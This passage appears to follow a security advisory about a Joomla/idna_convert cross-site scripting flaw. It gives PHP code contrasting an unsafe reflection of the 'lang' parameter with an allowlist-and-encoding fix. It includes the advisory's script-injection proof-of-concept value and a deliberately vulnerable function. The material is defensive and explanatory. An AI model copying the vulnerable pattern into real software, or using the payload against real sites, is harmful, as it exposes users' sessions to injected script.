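The advisory above attributes the issue to an unsanitized `lang` parameter and unsanitized file names written into the page. The PHP below is an added example, not the source of `example.php` (which this page does not show): it contrasts raw reflection into an HTML attribute with an allowlist plus `htmlspecialchars()`, using the advisory's proof-of-concept value as input. The `render_*` and `encode_attr()` functions, the markup and the language list are hypothetical.

```php
<?php
// Added example; not Joomla's or idna_convert's code. The markup and the
// language allowlist are assumptions made for the demonstration.
declare(strict_types=1);

const ALLOWED_LANGS = ['en', 'de'];   // hypothetical list of supported values

// Vulnerable pattern: the request value is concatenated into an attribute.
function render_unsafe(array $query): string
{
    $lang = $query['lang'] ?? 'en';
    return '<input type="hidden" name="lang" value="' . $lang . '">';
}

// Encode for the HTML attribute context; ENT_QUOTES covers both quote
// styles, ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: accept only known values, and still encode on output.
function render_safe(array $query): string
{
    $lang = $query['lang'] ?? 'en';
    if (!is_string($lang) || !in_array($lang, ALLOWED_LANGS, true)) {
        $lang = 'en';
    }
    return '<input type="hidden" name="lang" value="' . encode_attr($lang) . '">';
}

// Value of the lang parameter in the advisory's proof-of-concept URL.
$poc = ['lang' => '"><script>alert(document.cookie);</script><!--'];

// The unsafe output closes the attribute and starts a script element.
echo render_unsafe($poc), PHP_EOL;

// The allowlist falls back to the default value.
echo render_safe($poc), PHP_EOL;

// Values that cannot be allowlisted (such as the file names in the
// advisory's second injection point) are neutralized by encoding alone.
echo '<td title="' . encode_attr($poc['lang']) . '"></td>', PHP_EOL;
```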